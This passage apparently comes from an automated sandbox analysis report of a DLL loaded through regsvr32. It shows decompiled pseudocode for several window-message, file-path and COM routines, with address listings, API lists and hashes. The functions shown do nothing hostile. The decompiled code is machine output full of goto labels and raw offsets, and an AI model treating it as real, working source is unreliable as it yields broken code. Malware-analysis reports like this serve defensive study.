					_t100 = __ecx;
					_t60 = E100155FD(__ecx);
					__eflags =  *(__ecx + 0x80) & 0x00000020;
					_v20 = _t60;
					if(( *(__ecx + 0x80) & 0x00000020) != 0) {
						L5:
						__eflags = _t116 - 0x200;
						if(_t116 < 0x200) {
							L7:
							__eflags = _t116 - 0xa0 - 9;
							if(__eflags > 0) {
								L30:
								_t62 = E10014BA7(_t118);
								__eflags = _t62;
								if(_t62 == 0) {
									L32:
									__eflags = _v20;
									if(_v20 == 0) {
										L35:
										_t63 = IsWindow( *(_t118 + 0x20));
										__eflags = _t63;
										if(_t63 == 0) {
											L37:
											__eflags = 0;
											return 0;
										}
										return E10012240(_a4);
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t117 = _v20;
										_t67 =  *((intOrPtr*)( *_v20 + 0x100))(_a4);
										__eflags = _t67;
										if(_t67 != 0) {
											goto L1;
										}
										_t70 = E10014B68(_t117);
										__eflags = _t70;
										_v20 = _t70;
										if(_t70 != 0) {
											continue;
										}
										goto L35;
									}
									goto L1;
								}
								__eflags =  *(_t62 + 0x68);
								if( *(_t62 + 0x68) != 0) {
									goto L37;
								}
								goto L32;
							}
							L8:
							_v16 = E1001E375(0x201, _t100, _t116, _t118, __eflags);
							_t72 = _a4;
							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
							_v28.x =  *(_t72 + 0x14);
							ScreenToClient( *(_t118 + 0x20),  &_v28);
							E10049170(_t116,  &_v76, 0, 0x30);
							_v76 = 0x28;
							_t79 =  *((intOrPtr*)( *_t118 + 0x6c))(_v28.x, _v28.y,  &_v76);
							__eflags = _v40 - 0xffffffff;
							_v8 = _t79;
							if(__eflags != 0) {
								_push(_v40);
								E100470E9(0x201, _t116, _t118, __eflags);
							}
							__eflags = _t116 - 0x201;
							if(_t116 != 0x201) {
								L13:
								_v12 = _v12 & 0x00000000;
								__eflags = _t116 - 0x201;
								if(_t116 != 0x201) {
									_t92 = GetKeyState(1);
									__eflags = _t92;
									if(_t92 < 0) {
										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
									}
								}
								L16:
								__eflags = _v8;
								if(_v8 < 0) {
									L26:
									_t80 = GetKeyState(1);
									__eflags = _t80;
									if(_t80 >= 0) {
										L28:
										 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
										KillTimer( *(_t118 + 0x20), 0xe001);
										L29:
										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
										goto L30;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v12;
								if(_v12 != 0) {
									goto L26;
								}
								__eflags = _t116 - 0x202;
								if(_t116 != 0x202) {
									__eflags =  *(_t118 + 0x7c) & 0x00000008;
									if(( *(_t118 + 0x7c) & 0x00000008) != 0) {
										L25:
										 *((intOrPtr*)( *_t118 + 0x164))(_v8);
										goto L29;
									}
									_t87 = GetKeyState(1);
									__eflags = _t87;
									if(_t87 < 0) {
										goto L25;
									}
									_t111 = _v16;
									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
										goto L29;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E10042CB1(_t118);
									goto L29;
								}
								 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
								_push(0xc8);
								_push(0xe001);
								goto L20;
							}
							__eflags = _v72 & 0x80000000;
							if((_v72 & 0x80000000) == 0) {
								goto L13;
							}
							_v12 = 1;
							goto L16;
						}
						__eflags = _t116 - 0x209;
						if(__eflags <= 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t116 - 0x201;
					if(_t116 == 0x201) {
						goto L5;
					}
					__eflags = _t116 - 0x202;
					if(_t116 != 0x202) {
						goto L30;
					}
					goto L5;
				}
				L1:
				return 1;
			}




























                                                                                                                0x1004361a
                                                                                                                0x1004361e
                                                                                                                0x10043627
                                                                                                                0x10043631
                                                                                                                0x10043634
                                                                                                                0x10043635
                                                                                                                0x10043637
                                                                                                                0x1004363c
                                                                                                                0x10043643
                                                                                                                0x1004364b
                                                                                                                0x1004365d
                                                                                                                0x1004365d
                                                                                                                0x10043663
                                                                                                                0x1004366d
                                                                                                                0x10043673
                                                                                                                0x10043676
                                                                                                                0x100437b0
                                                                                                                0x100437b2
                                                                                                                0x100437b7
                                                                                                                0x100437ba
                                                                                                                0x100437c2
                                                                                                                0x100437c2
                                                                                                                0x100437c6
                                                                                                                0x100437ee
                                                                                                                0x100437f1
                                                                                                                0x100437f7
                                                                                                                0x100437f9
                                                                                                                0x10043807
                                                                                                                0x10043807
                                                                                                                0x00000000
                                                                                                                0x10043807
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100437c8
                                                                                                                0x100437c8
                                                                                                                0x100437c8
                                                                                                                0x100437d2
                                                                                                                0x100437d8
                                                                                                                0x100437da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100437e2
                                                                                                                0x100437e7
                                                                                                                0x100437e9
                                                                                                                0x100437ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100437ec
                                                                                                                0x00000000
                                                                                                                0x100437c8
                                                                                                                0x100437bc
                                                                                                                0x100437c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100437c0
                                                                                                                0x1004367c
                                                                                                                0x10043681
                                                                                                                0x10043684
                                                                                                                0x1004368d
                                                                                                                0x10043697
                                                                                                                0x1004369a
                                                                                                                0x100436a8
                                                                                                                0x100436be
                                                                                                                0x100436c5
                                                                                                                0x100436c8
                                                                                                                0x100436cc
                                                                                                                0x100436cf
                                                                                                                0x100436d1
                                                                                                                0x100436d4
                                                                                                                0x100436d9
                                                                                                                0x100436da
                                                                                                                0x100436dc
                                                                                                                0x100436f0
                                                                                                                0x100436f0
                                                                                                                0x100436f4
                                                                                                                0x100436f6
                                                                                                                0x100436fa
                                                                                                                0x10043700
                                                                                                                0x10043703
                                                                                                                0x1004370b
                                                                                                                0x1004370b
                                                                                                                0x10043703
                                                                                                                0x1004370e
                                                                                                                0x1004370e
                                                                                                                0x10043712
                                                                                                                0x1004377a
                                                                                                                0x1004377c
                                                                                                                0x10043782
                                                                                                                0x10043785
                                                                                                                0x1004378d
                                                                                                                0x10043793
                                                                                                                0x100437a1
                                                                                                                0x100437a7
                                                                                                                0x100437ad
                                                                                                                0x00000000
                                                                                                                0x100437ad
                                                                                                                0x10043787
                                                                                                                0x1004378b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004378b
                                                                                                                0x10043714
                                                                                                                0x10043718
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004371a
                                                                                                                0x10043720
                                                                                                                0x10043741
                                                                                                                0x10043745
                                                                                                                0x1004376b
                                                                                                                0x10043772
                                                                                                                0x00000000
                                                                                                                0x10043772
                                                                                                                0x10043749
                                                                                                                0x1004374f
                                                                                                                0x10043752
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043757
                                                                                                                0x1004375a
                                                                                                                0x1004375d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004375f
                                                                                                                0x10043764
                                                                                                                0x10043738
                                                                                                                0x1004373a
                                                                                                                0x00000000
                                                                                                                0x1004373a
                                                                                                                0x10043728
                                                                                                                0x1004372e
                                                                                                                0x10043733
                                                                                                                0x00000000
                                                                                                                0x10043733
                                                                                                                0x100436de
                                                                                                                0x100436e5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100436e7
                                                                                                                0x00000000
                                                                                                                0x100436e7
                                                                                                                0x10043665
                                                                                                                0x1004366b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004366b
                                                                                                                0x1004364d
                                                                                                                0x1004364f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043651
                                                                                                                0x10043657
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043657
                                                                                                                0x10043629
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreenWindow_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1268500159-3887548279
                                                                                                                • Opcode ID: 64ed9addaf683a1b86ec6b4ffff91413ac46c86aa955f030dd97174b6ef85283
                                                                                                                • Instruction ID: 62187ba6e2ba40476ccf44bbc32d417699c02d7eb00345c65f8ec2bcc569b145
                                                                                                                • Opcode Fuzzy Hash: 64ed9addaf683a1b86ec6b4ffff91413ac46c86aa955f030dd97174b6ef85283
                                                                                                                • Instruction Fuzzy Hash: 7C51BEB4A04245EFDB20DFA4C889B9DBBF1EF44350F329079E942E7291DB719A80CB45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002992A Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1002992A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x100b9e70; // 0xbb35530
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1004764D(0x1008ff07, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E1000A069(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						L1000140B(_t98 - 0x10, E100184C0());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E10029760(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							L100013E3( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10019530(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E100298FF( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								L100013E3( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E1000A0B7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E100298FF( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1004763E(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}






















                                                                                                                0x1002992a
                                                                                                                0x1002992a
                                                                                                                0x1002992a
                                                                                                                0x10029931
                                                                                                                0x10029935
                                                                                                                0x1002993c
                                                                                                                0x10029942
                                                                                                                0x10029949
                                                                                                                0x10029954
                                                                                                                0x1002995a
                                                                                                                0x10029960
                                                                                                                0x10029965
                                                                                                                0x1002996a
                                                                                                                0x1002996c
                                                                                                                0x1002996e
                                                                                                                0x1002996e
                                                                                                                0x1002996e
                                                                                                                0x1002997c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002998a
                                                                                                                0x10029992
                                                                                                                0x100299b1
                                                                                                                0x100299b3
                                                                                                                0x00000000
                                                                                                                0x100299b5
                                                                                                                0x100299be
                                                                                                                0x100299c3
                                                                                                                0x100299cc
                                                                                                                0x100299d4
                                                                                                                0x100299da
                                                                                                                0x100299dc
                                                                                                                0x10029a6e
                                                                                                                0x10029a74
                                                                                                                0x10029a7b
                                                                                                                0x10029a7b
                                                                                                                0x100299e2
                                                                                                                0x100299f2
                                                                                                                0x100299f8
                                                                                                                0x100299fa
                                                                                                                0x10029a12
                                                                                                                0x10029a16
                                                                                                                0x10029a19
                                                                                                                0x10029a19
                                                                                                                0x10029a1f
                                                                                                                0x10029a23
                                                                                                                0x00000000
                                                                                                                0x10029a25
                                                                                                                0x10029a2a
                                                                                                                0x10029a30
                                                                                                                0x10029a33
                                                                                                                0x00000000
                                                                                                                0x10029a35
                                                                                                                0x10029a36
                                                                                                                0x10029a3c
                                                                                                                0x10029a40
                                                                                                                0x00000000
                                                                                                                0x10029a42
                                                                                                                0x10029a42
                                                                                                                0x10029a45
                                                                                                                0x00000000
                                                                                                                0x10029a47
                                                                                                                0x10029a4b
                                                                                                                0x10029a54
                                                                                                                0x10029a58
                                                                                                                0x10029a5a
                                                                                                                0x00000000
                                                                                                                0x10029a5c
                                                                                                                0x10029a60
                                                                                                                0x10029a60
                                                                                                                0x10029a66
                                                                                                                0x00000000
                                                                                                                0x10029a6b
                                                                                                                0x10029a5a
                                                                                                                0x10029a45
                                                                                                                0x10029a40
                                                                                                                0x10029a33
                                                                                                                0x100299fc
                                                                                                                0x100299fc
                                                                                                                0x10029a00
                                                                                                                0x10029a05
                                                                                                                0x10029a0b
                                                                                                                0x00000000
                                                                                                                0x10029a0b
                                                                                                                0x100299fa
                                                                                                                0x100299dc
                                                                                                                0x10029994
                                                                                                                0x10029999
                                                                                                                0x100299a1
                                                                                                                0x100299a5
                                                                                                                0x100299aa
                                                                                                                0x100299aa
                                                                                                                0x100299aa
                                                                                                                0x10029a7f
                                                                                                                0x10029a87
                                                                                                                0x10029a88
                                                                                                                0x10029a89
                                                                                                                0x10029a9e

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10029949
                                                                                                                • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 1002998A
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • PathIsUNCA.SHLWAPI(?), ref: 100299D4
                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 100299F2
                                                                                                                • CharUpperA.USER32 ref: 10029A19
                                                                                                                • FindFirstFileA.KERNEL32(?,00000000), ref: 10029A2A
                                                                                                                • FindClose.KERNEL32(00000000), ref: 10029A36
                                                                                                                • lstrlenA.KERNEL32(?), ref: 10029A4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4099955704-0
                                                                                                                • Opcode ID: 2d133f7dd53ca02f4223dfed3d7f5fa10658c056192f086980df752fbbd6fbd5
                                                                                                                • Instruction ID: e6d24a488800c45a0210c296e119790506c70d007043d79cd7281b13a7672738
                                                                                                                • Opcode Fuzzy Hash: 2d133f7dd53ca02f4223dfed3d7f5fa10658c056192f086980df752fbbd6fbd5
                                                                                                                • Instruction Fuzzy Hash: EB41FF7190024AABEB00DBB4DC85BFF77BCFF053A4F500128F925E2191EB30AA44CA61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000B79D Relevance: 10.7, APIs: 7, Instructions: 209stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E1000B79D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t89;
				intOrPtr _t90;
				signed int* _t95;
				intOrPtr* _t96;
				void* _t99;
				void* _t110;
				void* _t113;
				intOrPtr* _t115;
				intOrPtr* _t119;
				WCHAR* _t125;
				intOrPtr* _t132;
				intOrPtr* _t137;
				void* _t158;
				signed int _t163;
				void* _t165;
				intOrPtr _t169;
				intOrPtr* _t171;
				WCHAR* _t175;
				void* _t177;
				void* _t178;

				_t158 = __edx;
				_push(0x48);
				E100476B6(0x1008de4d, __ebx, __edi, __esi);
				_t137 =  *((intOrPtr*)(_t177 + 8));
				_t163 = 0;
				 *((intOrPtr*)(_t177 - 0x2c)) =  *((intOrPtr*)(_t177 + 0xc));
				 *(_t177 - 0x50) =  *(_t177 + 0x1c);
				 *(_t177 - 0x28) = 0;
				 *((intOrPtr*)(_t177 - 0x44)) = 0;
				 *((intOrPtr*)(_t177 - 0x40)) = 0;
				 *((intOrPtr*)(_t177 - 0x24)) = 0;
				 *(_t177 - 0x38) = 0;
				_t89 = L10020F57(__ecx, _t137, 0x100a488c);
				 *((intOrPtr*)(_t177 - 0x48)) = _t89;
				 *(_t177 - 0x3c) = 0 | _t89 != 0x00000000;
				_t90 = L10020F57(_t89 != 0, _t137, 0x100a47fc);
				_push(_t177 - 0x20);
				 *((intOrPtr*)(_t177 - 0x4c)) = _t90;
				_push(_t137);
				if( *((intOrPtr*)( *_t137 + 0x3c))() != 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t163 = 0;
				}
				_t169 = 1;
				 *((intOrPtr*)( *_t137 + 0x40))(_t137, 1, _t177 - 0x28);
				if( *(_t177 - 0x3c) == _t163) {
					__eflags =  *((intOrPtr*)(_t177 - 0x2c)) - _t163;
					if( *((intOrPtr*)(_t177 - 0x2c)) == _t163) {
						_t113 =  *((intOrPtr*)( *_t137 + 0x20))(_t137, 4, 3, _t177 - 0x44);
						__eflags = _t113;
						if(_t113 == 0) {
							__imp__CreateBindCtx(_t163, _t177 - 0x40);
							_t115 =  *((intOrPtr*)(_t177 - 0x44));
							 *((intOrPtr*)( *_t115 + 0x50))(_t115,  *((intOrPtr*)(_t177 - 0x40)), _t163, _t177 - 0x2c);
							L10020F7B(_t177 - 0x40);
							goto L14;
						}
					}
				} else {
					_t185 =  *(_t177 - 0x28) - _t163;
					if( *(_t177 - 0x28) != _t163) {
						L1000AD75(_t177 - 0x24, E100184C0());
						 *(_t177 - 4) = _t163;
						E1000B503(_t177 - 0x24, 0xf094);
						_t173 =  *((intOrPtr*)( *((intOrPtr*)(_t177 - 0x24)) - 0xc)) + lstrlenW( *(_t177 - 0x28)) + 1;
						_t125 = E1000A7A4( *((intOrPtr*)(_t177 - 0x24)), _t185,  *((intOrPtr*)( *((intOrPtr*)(_t177 - 0x24)) - 0xc)) + lstrlenW( *(_t177 - 0x28)) + 1, 2);
						_t186 = _t125 - _t163;
						 *(_t177 - 0x3c) = _t125;
						if(_t125 != _t163) {
							 *(_t177 - 0x54) =  *(E10049097(_t186));
							 *(E10049097(_t186)) = _t163;
							_t175 =  *(_t177 - 0x3c);
							L10048F79(_t175, _t173, _t173 - 1,  *((intOrPtr*)(_t177 - 0x24)),  *(_t177 - 0x28));
							_t178 = _t178 + 0x14;
							_t132 = E10049097(_t186);
							_t187 =  *_t132 - _t163;
							if( *_t132 == _t163) {
								 *(E10049097(__eflags)) =  *(_t177 - 0x54);
							} else {
								E1000AD19( *((intOrPtr*)(E10049097(_t187))));
							}
							__imp__CoTaskMemFree( *(_t177 - 0x28));
							 *(_t177 - 0x28) = _t175;
						}
						 *(_t177 - 4) =  *(_t177 - 4) | 0xffffffff;
						L100013E3( *((intOrPtr*)(_t177 - 0x24)) + 0xfffffff0, _t158);
						_t169 = 1;
					}
					_t119 =  *((intOrPtr*)(_t177 - 0x48));
					 *((intOrPtr*)( *_t119 + 0x20))(_t119, _t177 - 0x2c);
					L14:
					 *((intOrPtr*)(_t177 - 0x24)) = _t169;
				}
				_t95 =  *(_t177 - 0x50);
				if(_t95 == _t163) {
					_t96 =  *((intOrPtr*)(_t177 - 0x4c));
					__eflags = _t96 - _t163;
					if(_t96 == _t163) {
						L19:
						 *(_t177 - 0x34) = _t163;
						 *(_t177 - 0x30) = _t163;
					} else {
						_t110 =  *((intOrPtr*)( *_t96 + 0x24))(_t96,  *((intOrPtr*)(_t177 + 0x10)), 0xffffffff, _t163, _t177 - 0x34);
						__eflags = _t110;
						if(_t110 != 0) {
							goto L19;
						}
					}
				} else {
					 *(_t177 - 0x34) =  *_t95;
					 *(_t177 - 0x30) = _t95[1];
				}
				_push(_t177 - 0x38);
				_push( *((intOrPtr*)(_t177 + 0x10)));
				_push(_t137);
				if( *((intOrPtr*)( *_t137 + 0x58))() != 0) {
					 *(_t177 - 0x38) = _t163;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t99 = E1000AA09();
				_t171 = __imp__CoTaskMemFree;
				_t165 = _t99;
				 *_t171( *(_t177 - 0x28),  *((intOrPtr*)(_t177 + 0x10)),  *(_t177 - 0x34),  *(_t177 - 0x30),  *((intOrPtr*)(_t177 + 0x14)),  *((intOrPtr*)(_t177 + 0x18)),  *(_t177 - 0x38),  *(_t177 - 0x28),  *((intOrPtr*)(_t177 - 0x2c)));
				if( *((intOrPtr*)(_t177 - 0x24)) != 0) {
					 *_t171( *((intOrPtr*)(_t177 - 0x2c)));
				}
				L10020F7B(_t177 - 0x44);
				L10020F7B(_t177 - 0x48);
				L10020F7B(_t177 - 0x4c);
				return E10047739(_t137, _t165, _t171);
			}























                                                                                                                0x1000b79d
                                                                                                                0x1000b79d
                                                                                                                0x1000b7a4
                                                                                                                0x1000b7ac
                                                                                                                0x1000b7af
                                                                                                                0x1000b7b1
                                                                                                                0x1000b7bd
                                                                                                                0x1000b7c0
                                                                                                                0x1000b7c3
                                                                                                                0x1000b7c6
                                                                                                                0x1000b7c9
                                                                                                                0x1000b7cc
                                                                                                                0x1000b7cf
                                                                                                                0x1000b7e1
                                                                                                                0x1000b7e4
                                                                                                                0x1000b7e7
                                                                                                                0x1000b7ef
                                                                                                                0x1000b7f0
                                                                                                                0x1000b7f5
                                                                                                                0x1000b7fb
                                                                                                                0x1000b805
                                                                                                                0x1000b806
                                                                                                                0x1000b807
                                                                                                                0x1000b808
                                                                                                                0x1000b809
                                                                                                                0x1000b809
                                                                                                                0x1000b813
                                                                                                                0x1000b816
                                                                                                                0x1000b81c
                                                                                                                0x1000b8e4
                                                                                                                0x1000b8e7
                                                                                                                0x1000b8f4
                                                                                                                0x1000b8f7
                                                                                                                0x1000b8f9
                                                                                                                0x1000b900
                                                                                                                0x1000b906
                                                                                                                0x1000b914
                                                                                                                0x1000b91b
                                                                                                                0x00000000
                                                                                                                0x1000b91b
                                                                                                                0x1000b8f9
                                                                                                                0x1000b822
                                                                                                                0x1000b822
                                                                                                                0x1000b825
                                                                                                                0x1000b834
                                                                                                                0x1000b841
                                                                                                                0x1000b844
                                                                                                                0x1000b858
                                                                                                                0x1000b85f
                                                                                                                0x1000b864
                                                                                                                0x1000b868
                                                                                                                0x1000b86b
                                                                                                                0x1000b874
                                                                                                                0x1000b87c
                                                                                                                0x1000b889
                                                                                                                0x1000b88d
                                                                                                                0x1000b892
                                                                                                                0x1000b895
                                                                                                                0x1000b89a
                                                                                                                0x1000b89c
                                                                                                                0x1000b8b5
                                                                                                                0x1000b89e
                                                                                                                0x1000b8a5
                                                                                                                0x1000b8aa
                                                                                                                0x1000b8ba
                                                                                                                0x1000b8c0
                                                                                                                0x1000b8c0
                                                                                                                0x1000b8c6
                                                                                                                0x1000b8cd
                                                                                                                0x1000b8d4
                                                                                                                0x1000b8d4
                                                                                                                0x1000b8d5
                                                                                                                0x1000b8df
                                                                                                                0x1000b920
                                                                                                                0x1000b920
                                                                                                                0x1000b920
                                                                                                                0x1000b923
                                                                                                                0x1000b928
                                                                                                                0x1000b937
                                                                                                                0x1000b93a
                                                                                                                0x1000b93c
                                                                                                                0x1000b952
                                                                                                                0x1000b952
                                                                                                                0x1000b955
                                                                                                                0x1000b93e
                                                                                                                0x1000b94b
                                                                                                                0x1000b94e
                                                                                                                0x1000b950
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000b950
                                                                                                                0x1000b92a
                                                                                                                0x1000b92f
                                                                                                                0x1000b932
                                                                                                                0x1000b932
                                                                                                                0x1000b95d
                                                                                                                0x1000b95e
                                                                                                                0x1000b961
                                                                                                                0x1000b967
                                                                                                                0x1000b969
                                                                                                                0x1000b969
                                                                                                                0x1000b98c
                                                                                                                0x1000b98d
                                                                                                                0x1000b98e
                                                                                                                0x1000b98f
                                                                                                                0x1000b990
                                                                                                                0x1000b998
                                                                                                                0x1000b99e
                                                                                                                0x1000b9a0
                                                                                                                0x1000b9a6
                                                                                                                0x1000b9ab
                                                                                                                0x1000b9ab
                                                                                                                0x1000b9b1
                                                                                                                0x1000b9ba
                                                                                                                0x1000b9c3
                                                                                                                0x1000b9cf

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000B7A4
                                                                                                                • lstrlenW.KERNEL32(?,0000F094,00000000), ref: 1000B84C
                                                                                                                • __snprintf_s.LIBCMT ref: 1000B88D
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000B8BA
